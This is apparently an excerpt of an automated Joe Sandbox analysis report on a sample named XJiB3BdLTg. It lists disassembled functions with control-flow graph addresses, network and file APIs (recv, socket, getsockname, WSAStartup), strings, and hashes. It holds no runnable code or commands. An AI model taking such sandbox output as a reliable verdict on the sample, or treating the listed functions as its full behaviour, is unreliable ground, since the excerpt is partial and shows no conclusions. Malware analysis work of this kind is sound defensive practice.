                                          control_flow_graph 1643 54d1d0-54d281 call 548d18 1646 54d3b7-54d3c1 1643->1646 1647 54d287-54d28e 1643->1647 1648 54d2da-54d2dd 1647->1648 1649 54d290-54d2a1 1648->1649 1650 54d2df-54d305 1648->1650 1653 54d2a3-54d2aa 1649->1653 1654 54d2ac-54d2b6 1649->1654 1651 54d3b0 1650->1651 1652 54d30b-54d324 1650->1652 1651->1646 1655 54d326-54d332 1652->1655 1653->1654 1656 54d2bf-54d2c2 1653->1656 1657 54d340-54d347 call 548c68 1654->1657 1658 54d2bc 1654->1658 1659 54d334-54d337 1655->1659 1660 54d358-54d35d 1655->1660 1662 54d2c9-54d2d4 1656->1662 1676 54d34c 1657->1676 1658->1656 1659->1657 1659->1660 1663 54d570-54d576 1659->1663 1664 54d6d3-54d6dc 1659->1664 1665 54d4fc-54d4fe 1659->1665 1666 54d4e4-54d4f7 call 54b640 1659->1666 1667 54d4c6-54d4c8 1659->1667 1668 54d6a6-54d6af 1659->1668 1669 54d620-54d62a 1659->1669 1670 54d700-54d735 call 54b6a0 1659->1670 1671 54d602-54d604 1659->1671 1672 54d5ad-54d5af 1659->1672 1673 54d5e9-54d5ec 1659->1673 1674 54d4ab-54d4ad 1659->1674 1675 54d5cb-54d5cd 1659->1675 1677 54d363-54d366 1660->1677 1678 54daeb-54db00 call 54b640 1660->1678 1662->1648 1662->1651 1679 54d5f2-54d5fd 1663->1679 1680 54d578-54d57e 1663->1680 1696 54d6e2-54d6fb call 54ca50 1664->1696 1697 54d9de-54d9ee call 54ca50 1664->1697 1682 54d3a0-54d3a4 1665->1682 1698 54d504-54d54f localeconv call 5578b0 1665->1698 1666->1662 1667->1682 1692 54d4ce-54d4df 1667->1692 1693 54d6b5-54d6ce call 54c9c0 1668->1693 1694 54da4c-54da65 call 54c9c0 1668->1694 1688 54d630-54d643 1669->1688 1689 54d8d2-54d8e7 1669->1689 1670->1662 1686 54dad1-54dad4 1671->1686 1687 54d60a-54d61b 1671->1687 1681 54d5b5-54d5c6 1672->1681 1672->1682 1673->1679 1684 54dbbc-54dbdd 1673->1684 1674->1682 1691 54d4b3-54d4c1 1674->1691 1675->1682 1683 54d5d3-54d5e4 1675->1683 1676->1656 1677->1678 1685 54d36c-54d36e 1677->1685 1678->1662 1704 54d3a6-54d3a8 1679->1704 1702 54d584-54d592 1680->1702 1703 54db05-54db18 1680->1703 1681->1704 1682->1704 1683->1704 1684->1704 1706 54d374-54d37f 1685->1706 1707 54dadb-54dae6 1685->1707 1686->1678 1711 54dad6 1686->1711 1687->1704 1709 54db9c-54db9e 1688->1709 1710 54d649-54d657 1688->1710 1700 54dba0-54dba2 1689->1700 1701 54d8ed-54d8fd 1689->1701 1691->1704 1692->1704 1693->1662 1694->1662 1696->1662 1722 54d9f3-54d9f7 1697->1722 1740 54d551-54d556 1698->1740 1741 54d55e-54d56b 1698->1741 1730 54dba4-54dbb7 call 54b9d0 1700->1730 1718 54d8ff-54d902 1701->1718 1719 54d909-54d918 1701->1719 1720 54dcd8-54dcda 1702->1720 1721 54d598-54d5a8 1702->1721 1703->1704 1704->1655 1727 54d3ae 1704->1727 1706->1682 1723 54d381-54d389 1706->1723 1709->1730 1725 54d663-54d670 1710->1725 1726 54d659-54d65c 1710->1726 1711->1707 1718->1719 1732 54d91e-54d92f 1719->1732 1733 54dc9a-54dcb4 call 54b9d0 1719->1733 1734 54dcf3-54dd13 1720->1734 1735 54dcdc-54dce7 1720->1735 1721->1704 1722->1662 1736 54db8c-54db97 1723->1736 1737 54d38f-54d39c 1723->1737 1738 54d676-54d687 1725->1738 1739 54dcb9-54dcd3 call 54b9d0 1725->1739 1726->1725 1727->1651 1743 54d935-54d93a 1732->1743 1744 54dc81-54dc8a 1732->1744 1733->1739 1734->1704 1735->1734 1736->1704 1737->1682 1747 54db1d-54db26 1738->1747 1748 54d68d-54d6a1 call 54cc90 1738->1748 1739->1722 1740->1741 1741->1704 1750 54d940-54d97a call 54cc90 1743->1750 1751 54db5c-54db5f 1743->1751 1744->1733 1747->1751 1748->1722 1750->1722 1751->1744 1757 54db65 1751->1757 1757->1736
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$Inf$NaN
                                          • API String ID: 0-141429178
                                          • Opcode ID: f13de62672542e07248f7d7a8f5b3a2b3abdb38862e67e84a235fb6968ee639a
                                          • Instruction ID: 3dbecaf39f97fa541daf5bf19d5fc61591c5cfc78c293d8c5a6c952deb907ac2
                                          • Opcode Fuzzy Hash: f13de62672542e07248f7d7a8f5b3a2b3abdb38862e67e84a235fb6968ee639a
                                          • Instruction Fuzzy Hash: C7F1AC7160C3868BD7219F24C0907EABFF1BBC5318F158A2DE9DD87382D73599058B92
                                          Function 001C7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1859 1c7770-1c778e 1860 1c77b6-1c77c2 recv 1859->1860 1861 1c7790-1c7797 1859->1861 1863 1c782e-1c7832 1860->1863 1864 1c77c4-1c77d9 call 1c72a0 1860->1864 1861->1860 1862 1c7799-1c77a1 1861->1862 1865 1c77db-1c7829 call 1c72a0 call 1ccb20 call 548c50 1862->1865 1866 1c77a3-1c77b4 1862->1866 1864->1863 1865->1863 1866->1864
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: recv
                                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                          • API String ID: 1507349165-640788491
                                          • Opcode ID: dea84c1c3b459275668c1f62b97fef37738eeb146b0976275dca72839b448e12
                                          • Instruction ID: 508d1f57b63f59bc453adb063518d232a32358d90a5a6ae53159a1c5a233d5a2
                                          • Opcode Fuzzy Hash: dea84c1c3b459275668c1f62b97fef37738eeb146b0976275dca72839b448e12
                                          • Instruction Fuzzy Hash: 9D11E7B56093187FD120AB649C4EF2B7B5CDBE6B68F55062CF84493282D7A1DC01C9B3
                                          Function 001C75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1878 1c75e0-1c75ed 1879 1c75ef-1c75f6 1878->1879 1880 1c7607-1c7629 socket 1878->1880 1879->1880 1881 1c75f8-1c75ff 1879->1881 1882 1c763f-1c7642 1880->1882 1883 1c762b-1c763c call 1c72a0 1880->1883 1884 1c7601-1c7602 1881->1884 1885 1c7643-1c7699 call 1c72a0 call 1ccb20 call 548c50 1881->1885 1883->1882 1884->1880
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                          • API String ID: 98920635-842387772
                                          • Opcode ID: b6ebbd1954016c312855005cadef5bcd52f7d8b6e83626d8ffce8d64b50e2d95
                                          • Instruction ID: d7bc35b120cf0d4a274e2821f2c3250801761fdf9d89515c1955ed5fd22031c9
                                          • Opcode Fuzzy Hash: b6ebbd1954016c312855005cadef5bcd52f7d8b6e83626d8ffce8d64b50e2d95
                                          • Instruction Fuzzy Hash: B6114CB1A143213BE6216B68AC4AF9B3F58DFD2774F040A28F404D62D2D351CC55D6E1
                                          Function 00548E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2063 548e90-548eb8 _open 2064 548eff-548f2c call 549f70 2063->2064 2065 548eba-548ec7 2063->2065 2075 548f39-548f51 call 548ca8 2064->2075 2066 548ef3-548efa call 548d20 2065->2066 2067 548ec9 2065->2067 2066->2064 2069 548ee2-548ef1 2067->2069 2070 548ecb-548ecd 2067->2070 2069->2066 2069->2067 2073 548ed3-548ed6 2070->2073 2074 6999b0-6999c7 2070->2074 2073->2069 2079 548ed8 2073->2079 2077 6999c9 2074->2077 2078 6999ca-6999f1 2074->2078 2081 548f30-548f37 2075->2081 2082 548f53-548f5e call 548cc0 2075->2082 2083 6999f9-6999ff 2078->2083 2079->2069 2081->2075 2081->2082 2082->2065 2085 699a19-699a3b 2083->2085 2086 699a01-699a0f 2083->2086 2090 699a3d-699a44 2085->2090 2091 699a46-699a5b 2085->2091 2088 699a15-699a18 2086->2088 2090->2091 2092 699a5d-699a72 2090->2092 2091->2086 2092->2088
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: _open
                                          • String ID: terminated$@
                                          • API String ID: 4183159743-3016906910
                                          • Opcode ID: 29f5350742f25d58c7d01ebc1c782817036abddd4674e804fd6392335c9a730b
                                          • Instruction ID: 5a29379b1f1b0c0231799361094c9d62fc9493eaf8e775da909770a7719d8e16
                                          • Opcode Fuzzy Hash: 29f5350742f25d58c7d01ebc1c782817036abddd4674e804fd6392335c9a730b
                                          • Instruction Fuzzy Hash: 45416CB09083059FDB10EF79C8846AEBBE5BB85318F10892DE898D7380EB35D805DB56
                                          Function 001FA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                          Download Yara Rule
                                          APIs
                                          • getsockname.WS2_32(?,?,00000080), ref: 001FA1C7
                                          Strings
                                          • getsockname() failed with errno %d: %s, xrefs: 001FA1F0
                                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 001FA23B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: getsockname
                                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                          • API String ID: 3358416759-2605427207
                                          • Opcode ID: b61662d4d119729d7dbe763cb4f696021090575c9e11e1e41e8edd8e4933f589
                                          • Instruction ID: a74e12d7cf89a65102741b4e87e2f3702d142d940fc8bb0e316f73a844ffbc64
                                          • Opcode Fuzzy Hash: b61662d4d119729d7dbe763cb4f696021090575c9e11e1e41e8edd8e4933f589
                                          • Instruction Fuzzy Hash: AB21D871948384AAE7259B18EC46FF773BCEFD1324F040614FA9853152FB32598586E2
                                          Function 001DD5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WS2_32(00000202), ref: 001DD65B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: Startup
                                          • String ID: if_nametoindex$iphlpapi.dll
                                          • API String ID: 724789610-3097795196
                                          • Opcode ID: 2e474abb0adebb7a182ad6040b4be8c20f14dbb15f1949632d4171b6d2542550
                                          • Instruction ID: a5f4a5d9867400348dece15eedf515e8dce10b92737799bca2581c5c7d458eb7
                                          • Opcode Fuzzy Hash: 2e474abb0adebb7a182ad6040b4be8c20f14dbb15f1949632d4171b6d2542550
                                          • Instruction Fuzzy Hash: 4B01FED0D543815AF751BB38BD1F7A636A05B51704F440579E888953D2FB7DC588C2D3
                                          Function 001CF7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: CloseEvent
                                          • String ID: multi.c
                                          • API String ID: 2624557715-214371023
                                          • Opcode ID: 43fbdb41c74a65a314c38dc0492f204bb66e0de08c7c12d1ba9632873733089e
                                          • Instruction ID: 33f2858c1a40289ccbc9b23224f7f512f557f1379a024709a2dccc96f7c8c5c7
                                          • Opcode Fuzzy Hash: 43fbdb41c74a65a314c38dc0492f204bb66e0de08c7c12d1ba9632873733089e
                                          • Instruction Fuzzy Hash: 425109B19043005BDB10AE309C42FA776A9AF71318F08443CF98D9A293FB75E51AC792
                                          Function 001C78B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: closesocket
                                          • String ID: FD %s:%d sclose(%d)
                                          • API String ID: 2781271927-3116021458
                                          • Opcode ID: 89123d13f7b509a0c882f884c84e2b4c0c2816b660c1338cbe2007f77c775104
                                          • Instruction ID: 40ec4aa7422fabb9a81d9eef540ffce86182e8e53bcd69beee7f4ce1847ae157
                                          • Opcode Fuzzy Hash: 89123d13f7b509a0c882f884c84e2b4c0c2816b660c1338cbe2007f77c775104
                                          • Instruction Fuzzy Hash: F8D05E729092212B8520A9996C49C8BABA8DED6F70B090D68F94067241E260DC0087E2
                                          Function 001C31D7 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: Rz
                                          • API String ID: 2962429428-626314018
